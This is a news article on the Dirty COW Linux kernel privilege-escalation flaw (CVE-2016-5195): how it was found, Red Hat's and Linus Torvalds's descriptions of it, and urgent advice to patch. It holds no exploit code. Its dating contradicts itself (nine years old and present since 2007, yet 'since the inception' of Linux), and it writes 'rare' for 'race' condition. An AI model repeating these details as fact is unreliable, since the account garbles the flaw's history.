Network security researchers have discovered a serious vulnerability that exploits a nine-year old kernel flaw called ‘Dirty COW’. This flaw is said to have existed since the inception of the operating system but is now under active exploitation. Thus, researchers are advising virtually all Linux users to install a update patch as soon as possible.
The vulnerability was first uncovered by security researcher Phil Oester who reported the same to V3 saying that “the exploit in the wild is trivial to execute, never fails and has probably been around for years.” It is said to take less than five seconds to gain access and modify root files we don’t inherently have write access to. If this vulnerability is not addressed right this moment, it will certainly become more widely-used in the near future, says Oester.
He further adds that the exploit has been present in the Linux operating system since 2007, but he was able to stumble upon and uncover this bug while examining a server that had been attacked using a similar exploit. He then stated that he had started capturing all inbound HTTP traffic and was able to extract the exploit and test it out in a sandbox.
This vulnerability i.e CVE-2016-5195, much like every other serious exploit, allows the user to perform a local privilege escalation and gain root access to the system. Once you gain access to root, you can not only read but also modify and write in those on-disk files(or binaries) which were earlier inaccessible without these rights. And since one can so easily write inside any root file, we can just leave an exploit code in network files and access the system remotely whenever I wish to.
This unprivileged access to gain write access to otherwise read-only memory mappings is the reason this exploit has been christened ‘Dirty COW’. RedHat has classified the exploit as ‘important’ and warned it users to patch the same with an update right away. It has further described the naming as,
A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write [COW] breakage of private read-only memory mappings.
This security flaw has been dubbed ancient by the creator of Linux kernel Linus Torvalds himself. In a git commit, he says the following,
This is an ancient bug that was actually attempted to be fixed once (badly) by me eleven years ago in commit but that was then undone due to problems on s390. In the meantime, the s390 situation has long been fixed, and we can now fix it by checking the pte_dirty() bit properly.
And before public disclosure of this vulnerability, the maintainers of the official Linux kernel have already patched the underlying bug this week. They’re currently handing it over to Downstream distributors so they can release updates incorporating the fix.
This is a rare condition vulnerability which is still present on all systems and servers using a Linux kernel, which are still likely to be prone to malicious attacks. It is advised, yet again, to update your PC as soon as the latest security update is made available to you.
You can watch this video to not only know more about this exploit, but also to see a live proof of concept being executed on a Linux system affected with the vulnerability.